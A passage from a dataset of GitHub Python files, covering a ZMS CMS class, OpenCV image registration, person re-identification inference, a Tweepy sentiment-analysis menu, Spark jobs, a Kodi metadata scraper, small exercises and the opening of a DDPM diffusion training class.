manage_options(self):\r\n return [self.operator_setitem( x, 'action', '../'+x['action']) for x in copy.deepcopy(self.aq_parent.manage_options())]\r\n\r\n manage_sub_options__roles__ = None\r\n def manage_sub_options(self):\r\n return (\r\n {'label': 'TAB_METADATA','action': 'manage_metas'},\r\n {'label': 'TAB_METAOBJ','action': 'manage_main'},\r\n )\r\n\r\n # Management Interface.\r\n # ---------------------\r\n manage = PageTemplateFile('zpt/ZMSMetamodelProvider/manage_main', globals())\r\n manage_main = PageTemplateFile('zpt/ZMSMetamodelProvider/manage_main', globals())\r\n manage_main_import = PageTemplateFile('zpt/ZMSMetamodelProvider/manage_main_import', globals())\r\n manage_main_acquire = PageTemplateFile('zpt/ZMSMetamodelProvider/manage_main_acquire', globals())\r\n manage_bigpicture = PageTemplateFile('zpt/ZMSMetamodelProvider/manage_bigpicture', globals())\r\n manage_analyze = PageTemplateFile('zpt/ZMSMetamodelProvider/manage_analyze', globals())\r\n manage_metas = PageTemplateFile('zpt/ZMSMetamodelProvider/manage_metas', globals())\r\n manage_readme = PageTemplateFile('zpt/ZMSMetamodelProvider/manage_readme', globals())\r\n manage_readme_iframe = PageTemplateFile('zpt/ZMSMetamodelProvider/manage_readme_iframe', globals())\r\n\r\n # Management Permissions.\r\n # -----------------------\r\n __administratorPermissions__ = (\r\n 'manage_changeProperties', 'manage_ajaxChangeProperties', 'manage_main', 'manage_main_import', 'manage_bigpicture',\r\n 'manage_changeMetaProperties', 'manage_metas',\r\n )\r\n __ac_permissions__=(\r\n ('ZMS Administrator', __administratorPermissions__),\r\n )\r\n\r\n ############################################################################\r\n # ZMSMetamodelProvider.__init__: \r\n #\r\n # Constructor.\r\n ############################################################################\r\n def __init__(self, model={}, metas=[]):\r\n self.id = 'metaobj_manager'\r\n self.model = model.copy()\r\n self.metas = copy.deepcopy(metas)\r\n\r\n # @see _confmanager:TemplateWrapper.__get__\r\n def getConfProperty(self, key, default=None):\r\n v = default\r\n try:\r\n if self.content is not None:\r\n v = self.content.getConfProperty(key, default)\r\n except:\r\n pass\r\n return v\r\n\r\n # --------------------------------------------------------------------------\r\n # ZMSMetamodelProvider.__bobo_traverse__\r\n # --------------------------------------------------------------------------\r\n def __bobo_traverse__(self, TraversalRequest, name):\r\n \r\n # If the name is in the list of attributes, call it.\r\n attr = getattr( self, name, None)\r\n if attr is not None:\r\n return attr\r\n \r\n # otherwise do some 'magic'\r\n else:\r\n standard.writeLog(self, \"[ZMSMetamodelProvider.__bobo_traverse__]: otherwise do some 'magic'\")\r\n ob = self.getHome().aq_parent\r\n while ob is not None:\r\n content = getattr( ob, 'content', None)\r\n if content is not None:\r\n metaobj_manager = getattr( content, self.id, None)\r\n if metaobj_manager is not None:\r\n # If the name is in the list of attributes, call it.\r\n attr = getattr( metaobj_manager, name, None)\r\n if attr is not None:\r\n return attr\r\n ob = getattr( ob, 'aq_parent', None)\r\n return None\r\n\r\n\r\n ############################################################################\r\n #\r\n # IRepositoryProvider\r\n #\r\n ############################################################################\r\n\r\n \"\"\"\r\n @see IRepositoryProvider\r\n \"\"\"\r\n def provideRepository(self, ids=None):\r\n standard.writeBlock(self, \"[provideRepository]: ids=%s\"%str(ids))\r\n r = {}\r\n self.provideRepositoryMetas(r, ids)\r\n self.provideRepositoryModel(r, ids)\r\n return r\r\n\r\n \"\"\"\r\n @see IRepositoryProvider\r\n \"\"\"\r\n def updateRepository(self, r):\r\n id = r['id']\r\n self.updateRepositoryMetas(r)\r\n self.updateRepositoryModel(r)\r\n return id\r\n\r\n################################################################################\r\n","repo_name":"zms-publishing/ZMS","sub_path":"Products/zms/ZMSMetamodelProvider.py","file_name":"ZMSMetamodelProvider.py","file_ext":"py","file_size_in_byte":6446,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"70"}
+{"seq_id":"10701362641","text":"import numpy as np\nimport cv2\n\ndef ripoc(a, b, m = None):\n g_a = np.asarray(cv2.cvtColor(a, cv2.COLOR_BGR2GRAY), 'float')\n g_b = np.asarray(cv2.cvtColor(b, cv2.COLOR_BGR2GRAY), 'float')\n\n h, w = g_a.shape\n hy = np.hanning(h)\n hx = np.hanning(w)\n hw = hy.reshape(h, 1)*hx\n \n f_a = np.fft.fftshift(np.log(np.abs(np.fft.fft2(g_a*hw))))\n f_b = np.fft.fftshift(np.log(np.abs(np.fft.fft2(g_b*hw))))\n\n if not m:\n l = np.sqrt(w*w + h*h)\n m = l/np.log(l)\n\n center = (w/2, h/2)\n flags = cv2.INTER_LANCZOS4 + cv2.WARP_POLAR_LOG\n p_a = cv2.warpPolar(f_a, (w, h), center, m, flags)\n p_b = cv2.warpPolar(f_b, (w, h), center, m, flags)\n (x, y), e = cv2.phaseCorrelate(p_a, p_b, hw)\n\n angle = y*360/h\n scale = (np.e)**(x/m)\n M = cv2.getRotationMatrix2D(center, angle, scale)\n t_b = cv2.warpAffine((g_b), M, (w, h))\n (x, y), e = cv2.phaseCorrelate(g_a, t_b)\n\n return x, y, angle, scale\n\nimg1 = cv2.imread(\"/home/nowatari/repos/isou/mandrill.png\")\nimg2 = cv2.imread(\"/home/nowatari/repos/isou/mandrill-s.png\")\n\nx, y, angle, scale = ripoc(img1, img2)\nprint(x, y, angle, scale)\n\nh, w, ch = img1.shape\nM = cv2.getRotationMatrix2D((w/2,h/2), angle, scale)\nM[0][2] -= x\nM[1][2] -= y\n\ndst = cv2.warpAffine(img2, M, (w, h))\ncv2.imwrite(\"/home/nowatari/repos/isou/mandrill-t.png\", dst)","repo_name":"NowatariSoma/Library_For_Research","sub_path":"isou/tmp.py","file_name":"tmp.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"72800282147","text":"\"\"\"\r\nGiven two sorted arrays nums1 and nums2 of size m and n respectively,\r\nreturn the median of the two sorted arrays.\r\nThe overall run time complexity should be O(log (m+n)).\r\n\"\"\"\r\n\r\nnums1 = [1, 3]\r\nnums2 = [2]\r\nnew_lst = sorted(nums1 + nums2)\r\nif len(new_lst) % 2 == 0:\r\n median = (new_lst[len(new_lst)//2 - 1] + new_lst[len(new_lst)//2]) / 2\r\nelse:\r\n median = new_lst[len(new_lst)//2]\r\nprint(median)","repo_name":"ArpineKeyan/Programming_Course_Python_CR","sub_path":"Coding_Marathon/Day1/Median of Two Sorted Arrays.py","file_name":"Median of Two Sorted Arrays.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"11257877754","text":"import os\nimport os.path as osp\nimport random\nimport shutil\nimport torch\nimport torchvision.transforms as transformers\nfrom PIL import Image\nfrom PersonReID.model.FFusion import FFusion, FFusion_cnn, FFusion_deit\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nif device == \"cuda\":\n torch.cuda.set_device(1)\n\ndef read_image(img_path):\n \"\"\"Keep reading image until succeed.\n This can avoid IOError incurred by heavy IO process.\"\"\"\n global img\n got_img = False\n if not osp.exists(img_path):\n raise IOError(\"{} does not exist\".format(img_path))\n while not got_img:\n try:\n img = Image.open(img_path).convert('RGB')\n got_img = True\n except IOError:\n print(\"IOError incurred when reading '{}'. Will redo. Don't worry. Just chill.\".format(img_path))\n pass\n return img\n\ndef get_img(file_dir, num, tar_dir=None):\n path = os.listdir(file_dir) # 获得图片的原始路径\n # file_num = len(pathDir) # 数据总量\n # img_num = int(file_num * rate)\n sample = random.sample(path, num) # 随机选取img_num数量的样本图片\n # print(sample)\n if tar_dir:\n for name in sample:\n shutil.copy(file_dir+name, tar_dir+name)\n return sample\n\ndef del_files(path_file):\n ls = os.listdir(path_file)\n for i in ls:\n f_path = os.path.join(path_file, i)\n # 判断是否是一个目录,若是,则递归删除\n if os.path.isdir(f_path):\n del_files(f_path)\n else:\n os.remove(f_path)\n\ndef check_dir(file):\n if os.path.exists(file):\n sz = os.path.getsize(file)\n if sz:\n del_files(file)\n else:\n os.makedirs(file)\n\ndef euclidean_distance(qf, gf):\n m = qf.shape[0]\n n = gf.shape[0]\n dist_mat = torch.pow(qf, 2).sum(dim=1, keepdim=True).expand(m, n) + \\\n torch.pow(gf, 2).sum(dim=1, keepdim=True).expand(n, m).t()\n dist_mat.addmm_(1, -2, qf, gf.t())\n dist_mat.detach().cpu().numpy()\n return dist_mat\n\ndef load(model_name, dataset_name, gallery_num):\n # -----------加载模型----------------\n model_factory = {\n \"ResNet50\": FFusion_cnn,\n \"DeiT\": FFusion_deit,\n \"FFusion\": FFusion\n }\n dataset_classes = {\n \"Market1501\": 751,\n \"DukeMTMC-reID\": 702\n }\n model = model_factory[model_name](num_classes=dataset_classes[dataset_name])\n model.load_param('PersonReID/logs/{}/{}_100.pth'.format(dataset_name, model_name)) #加载预训练好的参数\n model.to(device)\n model.eval()\n\n infer_transforms = transformers.Compose([\n transformers.Resize([256, 128]),\n transformers.ToTensor(),\n transformers.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n ])\n\n query_dir = 'PersonReID/data/{}/query/'.format(dataset_name)\n query_tardir = 'PersonReID/data/inference/query/'\n check_dir(query_tardir) # 检查目录是否存在并清除上一次采样的数据\n\n gallery_dir = 'PersonReID/data/{}/bounding_box_test/'.format(dataset_name)\n gallery_tardir = 'PersonReID/data/inference/gallery/'\n check_dir(gallery_tardir)\n\n query_sample = get_img(query_dir, 1, query_tardir) # query_sample存放采样的query图片的名称\n query_img = read_image(query_tardir+query_sample[0])\n query_trans = infer_transforms(query_img).unsqueeze(0).to(device)\n query_feat = model(query_trans)\n\n gallery_sample = get_img(gallery_dir, gallery_num, gallery_tardir) # gallery_sample存放采样的gallery图片的名称\n gallery2dis = {}\n for sample in gallery_sample:\n gallery_img = read_image(gallery_tardir+sample)\n gallery_trans = infer_transforms(gallery_img).unsqueeze(0).to(device)\n gallery_feat = model(gallery_trans)\n distance = euclidean_distance(query_feat, gallery_feat)\n gallery2dis[sample] = '%.3f' % float(distance)\n return query_sample, gallery2dis\n","repo_name":"LJunJing/reid_sys","sub_path":"PersonReID/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":3959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"3013035829","text":"#!/usr/bin/env python3\n\nimport os\nfrom py.CreateClassifiers import create_classifiers, cleanup_classifiers\nfrom py.DrawGraph import draw_piechart\nfrom py.StoreTweetReview import cleanup_reviews, store\nfrom py.GetLiveTweets import cleanup_tweets, get_live_tweets\nfrom py.GetSearchTweets import get_search_tweets\nfrom py.AnalysisWithAffin import analyse_with_affin\nfrom py.AnalysisWithOpinionLexicon import analyse_with_opinion\nfrom py.CreateDatasetWithTweets import create_dataset\n\nif os.name == 'nt':\n clear_screen = \"cls\"\nelse:\n clear_screen = \"clear\"\n\ndef main():\n while True:\n os.system(clear_screen)\n print(\"\\t\\t\\tSentiment Analysis\")\n print(\"\\t\\t\\t\" + 18 * \"-\")\n print(\"\\nOptions:-\\n\")\n print(\"1. Get live tweets using Tweepy\\n2. Get search tweets using Tweepy\\n3. Show first 10 tweets\\n4. Sentiment Analysis using NLTK's Opinion Lexicon\\n5. Sentiment Analysis using AFINN-111.txt\\n6. Sentiment Analysis using Machine Learning Algorithms\\n7. Exit\")\n c = input(\"\\nCHOICE: \")\n try:\n c = int(c)\n except:\n print(\"Enter an integer value\")\n input(\"Press ENTER to continue.....\")\n continue\n if c < 1 or c > 7:\n print(\"Enter a value between 1 and 6\")\n input(\"Press ENTER to continue.....\")\n continue\n\n if c == 1:\n while True:\n os.system(clear_screen)\n print(\"\\t\\t\\tGet live tweets using Tweepy\")\n print(\"\\t\\t\\t----------------------------\")\n print(\"\\nINFO:\\tThis option will fetch live tweets from Twitter using Tweepy API.\\n\\tSince Tweepy is fetching live tweets it is much slower than TwitterSearch API.\\n\\tVery useful if you want to look for current affairs.\\n\\n\")\n\n print(\"1. Delete old tweets in the tweets folder\\n2. Get new tweets\\n3. Go Back\")\n ch = input(\"\\nCHOICE: \")\n try:\n ch = int(ch)\n except:\n print(\"Enter an integer value\")\n input(\"Press ENTER to continue...\")\n continue\n if ch == 1:\n print(\"Old tweets removed.\")\n cleanup_tweets()\n input(\"Press ENTER to continue...\")\n elif ch == 2:\n search_topic = []\n topic = input(\"Enter topic you need to search: \")\n search_topic.append(topic)\n\n try:\n with open(\"tweets/twitter.txt\", encoding = \"utf_16\") as f:\n lines = len(f.read().split(\"\\n\"))\n except:\n lines = 0\n\n while True:\n tweet_count = input(\"How many tweets do you need? (default is 200): \")\n if tweet_count == \"\":\n get_live_tweets(search_topic, 200, lines)\n break\n try:\n tweet_count = int(tweet_count)\n break\n except:\n print(\"Enter an integer value\")\n\n get_live_tweets(search_topic, tweet_count, lines)\n print(\"\\n\\nNew Tweets fetched\")\n input(\"Press ENTER to continue...\")\n elif ch == 3:\n break\n else:\n print(\"Enter a number between 1 and 3\")\n input(\"Press ENTER to continue...\")\n\n elif c == 2:\n while True:\n os.system(clear_screen)\n print(\"\\t\\t\\tGet search tweets using Tweepy\")\n print(\"\\t\\t\\t-------------------------------\")\n print(\"\\nINFO:\\tThis option will fetch all except live tweets from Twitter using Tweepy API.\\n\\tSince we are searching instead of live streaming it is much faster.\\n\\tVery useful if you want to look for old events.\\n\\n\")\n\n print(\"1. Delete old tweets in the tweets folder\\n2. Get new tweets\\n3. Go Back\")\n ch = input(\"\\nCHOICE: \")\n try:\n ch = int(ch)\n except:\n print(\"Enter an integer value\")\n input(\"Press ENTER to continue...\")\n continue\n if ch == 1:\n print(\"Old tweets removed.\")\n cleanup_tweets()\n input(\"Press ENTER to continue...\")\n elif ch == 2:\n search_topic = input(\"Enter topic you need to search: \")\n f = 0\n while True:\n tweet_count = input(\"How many tweets do you need? (default is 200): \")\n if tweet_count == \"\":\n f = 1\n break\n try:\n tweet_count = int(tweet_count)\n break\n except:\n print(\"Enter an integer value\")\n\n if f == 0:\n print(\"\\nFetching %d tweets on the topic %s....\" %(tweet_count, search_topic))\n for i in range(int(tweet_count/100)):\n get_search_tweets(search_topic, 100)\n if not tweet_count%100 == 0:\n get_search_tweets(search_topic, tweet_count%100)\n else:\n print(\"\\nFetching 200 tweets on the topic %s....\" %search_topic)\n get_search_tweets(search_topic, 100)\n get_search_tweets(search_topic, 100)\n\n print(\"\\n\\nNew Tweets fetched\")\n input(\"Press ENTER to continue...\")\n elif ch == 3:\n break\n else:\n print(\"Enter a number between 1 and 3\")\n input(\"Press ENTER to continue...\")\n\n\n elif c == 3:\n os.system(clear_screen)\n print(\"\\t\\t\\tFirst 10 tweets\")\n print(\"\\t\\t\\t---------------\\n\\n\")\n with open(\"tweets/twitter.txt\", encoding = \"utf_16\") as f:\n tweets = f.read().split(\"\\n\")\n for tweet in tweets[:10]:\n print(tweet)\n print(\"------------------------------------\")\n input(\"\\n\\nPress ENTER to continue......\")\n\n elif c == 4:\n while True:\n os.system(clear_screen)\n print(\"\\t\\t\\tSentiment Analysis using NLTK's Opinion Lexicon\")\n print(\"\\t\\t\\t-----------------------------------------------\")\n print(\"\\nINFO:\\tNLTK's opinion lexicon contains lists for posiive and negative words.\\n\\tThis algorithm uses these lists to find out the number of positive and negative words in a tweet.\\n\\tThe number of positive and negative words in the tweet determines if it is positive or negative.\")\n print(\"\\n1. Analyse using Opinion lexicon.\\n2. Go Back\")\n ch = input(\"\\nCHOICE: \")\n try:\n ch = int(ch)\n except:\n print(\"Enter an integer value\")\n input(\"Press ENTER to continue...\")\n continue\n if ch == 1:\n print(\"Analyzing. Please wait....\")\n analyse_with_opinion()\n input(\"Press ENTER to continue...\")\n elif ch == 2:\n break\n else:\n print(\"Enter a number between 1 and 2\")\n input(\"Press ENTER to continue...\")\n\n elif c == 5:\n while True:\n os.system(clear_screen)\n print(\"\\t\\t\\tSentiment Analysis using AFINN-111.txt\")\n print(\"\\t\\t\\t--------------------------------------\")\n print(\"\\nINFO:\\tAFINN-111.txt contains a list of posiive and negative words along with their score.\\n\\tThis algorithm uses these scores to find out the total score of positive and negative words in a tweet.\\n\\tThe total score of positive and negative words in the tweet determines if it is positive or negative.\")\n print(\"\\n1. Analyse using AFINN-111.txt.\\n2. Go Back\")\n ch = input(\"\\nCHOICE: \")\n try:\n ch = int(ch)\n except:\n print(\"Enter an integer value\")\n input(\"Press ENTER to continue...\")\n continue\n if ch == 1:\n print(\"Analyzing. Please wait....\")\n analyse_with_affin()\n input(\"Press ENTER to continue...\")\n elif ch == 2:\n break\n else:\n print(\"Enter a number between 1 and 2\")\n input(\"Press ENTER to continue...\")\n\n elif c == 6:\n while True:\n os.system(clear_screen)\n print(\"\\t\\t\\tSentiment Analysis using Machine Learning\")\n print(\"\\t\\t\\t-----------------------------------------\")\n print(\"\\nINFO:\\tThis module trains and creates classifiers which are used to classify the tweets.\\n\\tThe classifiers (which are mainly Machine Learning algorithms) used here are Naive Bayes, Bernoulli Naive Bayes,\\n\\tMultinomial Naive Bayes, Logistic Regression and Stochastic Gradient Descent.\")\n print(\"\\n1. Delete the old trained classifiers\\n2. Train classifiers using new tweets in tweets/twitter.txt\\n3. Analyse tweets using the classifiers and draw pie charts for them.\\n4. Go Back\")\n ch = input(\"\\nCHOICE: \")\n try:\n ch = int(ch)\n except:\n print(\"Enter an integer value\")\n input(\"Press ENTER to continue...\")\n continue\n if ch == 1:\n print(\"Previous classifiers are being wiped out....\")\n cleanup_classifiers()\n input(\"Press ENTER to continue...\")\n elif ch == 2:\n print(\"Dataset is being created.....\")\n create_dataset(\"tweets/twitter.txt\")\n print(\"Classfiers are being created....\")\n create_classifiers()\n input(\"Press ENTER to continue...\")\n elif ch == 3:\n print(\"Analyzing. Please wait....\")\n cleanup_reviews()\n store()\n draw_piechart()\n input(\"Press ENTER to continue...\")\n elif ch == 4:\n break\n else:\n print(\"Enter a number between 1 and 4\")\n input(\"Press ENTER to continue...\")\n\n elif c == 7:\n print(\"Exiting.....\")\n return\n\ntry:\n main()\nexcept KeyboardInterrupt as e:\n print(\"\\n\\nCTRL + C pressed. Exiting....\")\n","repo_name":"EvilPort2/Sentiment-Analysis","sub_path":"sentiment-analysis-main.py","file_name":"sentiment-analysis-main.py","file_ext":"py","file_size_in_byte":11179,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"70"}
+{"seq_id":"27637852659","text":"import os\nimport sys\nfrom pathlib import Path\n\nimport xbmc\nimport xbmcgui\nimport xbmcplugin\n\nimport MediaType\nimport movie_actions\nimport param_reader\nimport tv_actions\nfrom find_source_path import find_source_path\nfrom lib import vsmeta_parser\n\n# Actions performed by Kodi\nFIND_ACTION = \"find\"\nGET_DETAILS_ACTION = \"getdetails\"\nGET_EPISODE_LIST_ACTION = \"getepisodelist\"\nGET_EPISODE_DETAILS_ACTION = \"getepisodedetails\"\n\n\ndef get_file_path(title):\n \"\"\"\n Returns the file path of the given media title.\n\n :param title: the media title\n\n :return: the file path to the media title, or None if the file path cannot be determined\n \"\"\"\n folder_path = xbmc.getInfoLabel('Container.FolderPath')\n if os.path.exists(folder_path):\n root_directory = folder_path\n else:\n root_directory = find_source_path(title)\n return next(Path(root_directory).rglob(title + \".*\" + \".vsmeta\"), None) if root_directory else None\n\n\ndef is_tv_show(title):\n \"\"\"\n Returns true if the media title is a TV show.\n This requires the initial \"find\" action to be performed on the media source beforehand.\n\n :param title: The media title\n\n :return: true if the item is a TV show, false otherwise\n \"\"\"\n list_item = xbmcgui.ListItem(title, offscreen=True)\n media_type = list_item.getVideoInfoTag().getMediaType()\n xbmc.log(f\"Media Type: {media_type}\")\n return MediaType.is_tv(media_type)\n\n\ndef get_vsmeta_path(url):\n if not os.path.exists(url):\n return None\n\n if os.path.isfile(url):\n return Path(url + \".vsmeta\")\n else:\n return next(Path(url).rglob(\"*.vsmeta\"), None)\n\n\ndef find(title, plugin_handle):\n xbmc.log(f\"Searching for title: {title}\", xbmc.LOGINFO)\n file_path = get_file_path(title)\n if file_path:\n xbmc.log(f\"Using path '{file_path}' for analyzing {title}\", xbmc.LOGDEBUG)\n\n metadata = vsmeta_parser.parse(str(file_path), False)\n\n if metadata.is_tv_show():\n item_details = tv_actions.find(title, metadata, file_path)\n else:\n item_details = movie_actions.find(title, metadata, file_path)\n\n xbmcplugin.addDirectoryItem(handle=plugin_handle,\n url=str(item_details[\"url\"]),\n listitem=item_details[\"list_item\"],\n isFolder=False)\n else:\n xbmc.log(f\"No vsmeta file found for {title}\", xbmc.LOGWARNING)\n\n\ndef get_details(title, url, plugin_handle):\n xbmc.log(f\"Getting details for {url}\", xbmc.LOGINFO)\n file_path = get_vsmeta_path(url)\n if file_path:\n metadata = vsmeta_parser.parse(str(file_path), True)\n\n if metadata.is_tv_show():\n list_item = tv_actions.get_details(title, metadata, file_path) if file_path else None\n else:\n list_item = movie_actions.get_details(title, metadata, url)\n xbmcplugin.setResolvedUrl(handle=plugin_handle, succeeded=True, listitem=list_item)\n else:\n xbmc.log(f\"No vsmeta file found for at {url}\", xbmc.LOGWARNING)\n\n\ndef get_episode_list(title, url, plugin_handle):\n if os.path.exists(url):\n episodes = tv_actions.get_episode_list(title, url)\n [xbmcplugin.addDirectoryItem(plugin_handle,\n url=episode[\"url\"],\n listitem=episode[\"list_item\"],\n isFolder=True)\n for episode in episodes]\n else:\n xbmc.log(f\"No vsmeta file found for {title} at {url}\", xbmc.LOGWARNING)\n\n\ndef get_episode_details(title, url, plugin_handle):\n metadata_path = url + \".vsmeta\"\n xbmc.log(f\"Reading ${metadata_path}\")\n if os.path.exists(metadata_path):\n list_item = tv_actions.get_episode_details(metadata_path)\n xbmcplugin.setResolvedUrl(plugin_handle, True, list_item)\n else:\n xbmc.log(f\"No vsmeta file found for {title} at {url}\", xbmc.LOGWARNING)\n xbmcplugin.setResolvedUrl(plugin_handle, False, xbmcgui.ListItem(offscreen=True))\n\n\ndef scrape(params, plugin_handle):\n \"\"\"\n Scrapes the Synology Videostation VSMeta files to analyze Kodi media items.\n\n Movies and TV shows take slightly different flows.\n Movies use a two-stage analysis process:\n 1. The \"find\" action is initially performed to obtain the title.\n 2. The \"getdetails\" action is performed to obtain the movie details.\n TV Shows use a four-stage analysis process:\n 1. The \"find\" action is initially performed to obtain the TV show title.\n 2. The \"getdetails\" action is performed to obtain the TV show details.\n 3. The \"getepisodelist\" action is performed on the TV show title-level to get the list of episodes.\n 4. Finally, the \"getepisodedetails\" action is performed on each TV show episode to get the details for the episodes.\n\n :param params: the scraper parameters\n :param plugin_handle: the plugin handle ID\n :return: Nothing\n \"\"\"\n action = params.get('action')\n url = params.get('url')\n title = params.get(\"title\")\n\n if action == FIND_ACTION:\n find(title, plugin_handle)\n elif action == GET_DETAILS_ACTION:\n get_details(title, url, plugin_handle)\n elif action == GET_EPISODE_LIST_ACTION:\n get_episode_list(title, url, plugin_handle)\n elif action == GET_EPISODE_DETAILS_ACTION:\n get_episode_details(title, url, plugin_handle)\n else:\n xbmc.log(f\"Unsupported action {action} provided for analyzing {title}\", xbmc.LOGWARNING)\n\n xbmcplugin.endOfDirectory(plugin_handle)\n\n\nscrape(param_reader.read(), int(sys.argv[1]))\n","repo_name":"shaundsmith/kodi-vsmeta","sub_path":"addon.py","file_name":"addon.py","file_ext":"py","file_size_in_byte":5614,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"43924734885","text":"from pyspark import SparkContext\n\nsc = SparkContext(appName=\"countOver10\")\n#lines = sc.textFile(\"/user/x_pauth/data/temperature-readings.csv\").cache()\nlines = sc.textFile(\"data/temperature-readings.csv\").cache()\nlines = lines.map(lambda a: a.split(';'))\nlines = lines.filter(lambda x: int(x[1][0:4]) >= 1950 and int(x[1][0:4]) <= 2014)\nlines = lines.filter(lambda x: float(x[3]) > 10)\n\nstations = lines.map(lambda x: (x[0]+';'+x[1][:7], 1))\nstations = stations.reduceByKey(lambda v1, v2: v1)\n\nover10 = stations.map(lambda x: (x[0].split(';')[1], 1))\n\ncntOver10 = over10.reduceByKey(lambda v1, v2: v1+v2)\n#cntOver10.saveAsTextFile(\"/user/x_pauth/results/cntOver10StationsUnique\")\ncntOver10.saveAsTextFile(\"results/cntOver10StationsUnique\")\n","repo_name":"PolacekTomas/TDDE31_big-data-analytics","sub_path":"lab1-final/lab1_task2b.py","file_name":"lab1_task2b.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"72062069026","text":"import csv\nimport os\nimport signal\nimport numpy as np\nimport node as nd\n\n#read mapping of APP & pid\ndef ReadTable():\n\twith open('table.csv',\"r\") as fp:\n\t\treader = csv.reader(fp)\n\t\tdict={rows[0]:rows[1] for rows in reader}\n\treturn dict \ndef sendSignal(pid):\n\tos.kill(pid,signal.SIGUSR1)\n\ndef extractInfo():\n\twith open('app//app.info',\"r\") as fp:\n\t\tcontents = fp.readlines()\n\t\tfor content in contents:\n\t\t\t[a,b]=content.rstrip('\\n').split(':')\n\t\t\tnd.Node()\n#\t\tprint(a)\n#\t\tprint(b)\n\ndict = ReadTable()\n\nprint(dict['bfs_2'])\n\n#ID = dict['bfs']\n#sendSignal(ID);\nextractInfo()\n\n","repo_name":"yachiyang01/computeNode","sub_path":"profiler/schedule.py","file_name":"schedule.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"9639390996","text":"# Import the math module so I can use math.pi and math.sqrt.\nimport math\nfrom datetime import datetime, timedelta\n\ncurrent_date = datetime.now().date()\n\nwarranty_duration = timedelta(weeks=1)\nwaranty_date = current_date + warranty_duration\n\nnew = input('Are these new tires? (yes or no): ')\nnew = new.lower()\n\n# Get the width, aspect ratio, and diameter of the tire\nwidth = abs(float(input('Enter the width of the tire in mm (ex 205): ')))\nratio = abs(float(input('Enter the aspect ratio of the tire (ex 60): ')))\ndiameter = abs(float(input('Enter the diameter of the wheel in inches (ex 15): ')))\n\n# Compute the volume of the tire\nbracket = width * ratio + 2540 * diameter\nvolume = math.pi * width**2 * ratio * bracket / 10000000000\n\n#Round the volume to two digits after the decimal point\nvolume = round(volume, 2)\n\n# Print the volume for the user to see\nprint(f'The approximate volume is {volume} liters')\n\n# open volumes.txt\n# add line to it with the following data:\n # current date\n # width of the tire\n # aspect ratio of the tire\n # diameter of the wheel\n # volume of the tire\n\nwith open('volumes.txt', 'at') as volumes_file:\n if new == 'yes':\n response = f'These tires are under waranty until {waranty_date}'\n \n else:\n \n response = 'These tires are not under waranty'\n \n print(f'{current_date}, {width:.0f}, {ratio:.0f}, {diameter:.0f}, {volume:.02f}', file=volumes_file)\n print(f'{response}', file=volumes_file)\n\n","repo_name":"JacobHoltby/cse111","sub_path":"python tire_volume.py","file_name":"python tire_volume.py","file_ext":"py","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"15259072528","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\ndef log_odds(p):\n return np.log(p / (1 - p))\n\nx = np.arange(0.005, 1, 0.005)\nlog_odds_x = log_odds(x)\n\nplt.plot(x, log_odds_x)\nplt.axvline(0.0, color='k')\nplt.ylim(-8, 8)\nplt.xlabel('x')\nplt.ylabel('log_odds(x)')\n\n# y axis ticks and gridline\nplt.yticks([-7, 0, 7])\nax = plt.gca()\nax.yaxis.grid(True)\n\nplt.tight_layout()\nplt.show()\n","repo_name":"NMHai/Kaggle-Titanic","sub_path":"logOddRatio.py","file_name":"logOddRatio.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"30310636655","text":"import os\nfrom pathlib import Path\nfrom typing import Dict\n\nimport numpy as np\nimport pytorch_lightning as pl\nimport torch\nimport torch.nn.functional as F\nfrom accelerate import Accelerator\nfrom diffusers import DDPMScheduler, UNet2DModel, __version__\nfrom diffusers.optimization import get_scheduler\nfrom diffusers.pipelines import DDPMPipeline\nfrom diffusers.training_utils import EMAModel\nfrom diffusers.utils import deprecate\nfrom packaging import version\nfrom PIL import Image\nfrom torch import nn\nfrom tqdm import tqdm\n\nfrom config import DDPMTrainConfig\n\ndiffusers_version = version.parse(version.parse(__version__).base_version)\n\n\nclass DDPM(nn.Module):\n def __init__(self, config: DDPMTrainConfig):\n \"\"\"\n Denoising Diffusion Probabilistic Model.\n\n Initializes a UNet2D model and can be used to train a Denoising Diffusion Probabilistic Model in order to generate images by running the train method\n\n Args:\n config: Config object containing the model and training parameters\n\n Reference:\n https://proceedings.neurips.cc/paper/2020/file/4c5bcfec8584af0d967f1ab10179ca4b-Paper.pdf\n \"\"\"\n super(DDPM, self).__init__()\n self.config = config\n self.model = UNet2DModel(\n sample_size=config.image_size,\n in_channels=config.channels,\n out_channels=config.channels,\n layers_per_block=2,\n block_out_channels=(128, 128, 256, 256, 512, 512),\n down_block_types=config.downblock_types,\n up_block_types=config.upblock_types,\n )\n\n self.noise_scheduler = None\n self.optimizer = None\n self.lr_scheduler = None\n\n self.logger = None\n self.wandb_run_id = None\n self.wandb_run_name = None\n\n self.global_step = 0\n\n def train(\n self,\n trainset,\n accelerator: Accelerator,\n logger: pl.loggers.WandbLogger,\n ):\n \"\"\"\n Trains the model to generate images.\n\n Args:\n trainset: Torch Dataset\n accelerator: Diffusors Accelerator to train on multiple devices\n logger: Pytorch Lightning W&B Logger.\n \"\"\"\n self.on_fit_start()\n self.logger = logger\n self.noise_scheduler = DDPMScheduler(\n 